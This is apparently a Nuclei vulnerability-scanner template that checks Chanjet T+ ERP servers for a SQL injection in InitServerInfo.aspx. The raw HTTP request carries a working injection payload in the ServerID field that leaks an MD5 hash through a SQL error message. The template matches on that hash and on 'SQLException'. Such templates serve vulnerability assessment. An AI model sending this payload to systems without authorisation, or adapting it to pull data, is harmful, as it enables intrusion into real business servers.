id: chanjet-tplus-initserverinfo-sqli

info:
  name: Chanjet Tplus InitServerInfo - SQL Injection
  author: qwtd
  severity: high
  tags: 畅捷通-TPlus

http:
  - raw:
      - |
        GET /tplus/UFAQD/InitServerInfo.aspx?preload=1 HTTP/1.1
        Host: {{Hostname}}
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
        Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
        Accept-Encoding: gzip, deflate
        Content-Type: application/x-www-form-urlencoded
        Connection: close
        Upgrade-Insecure-Requests: 1

        operbtn=create&ServerID=1'%2b(select 1 where 1 in (SELECT sys.fn_varbintohexstr(hashbytes('MD5','123456'))))%2b'1

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "e10adc"
          - "SQLException"
        condition: and
        
      - type: status
        status:
          - 200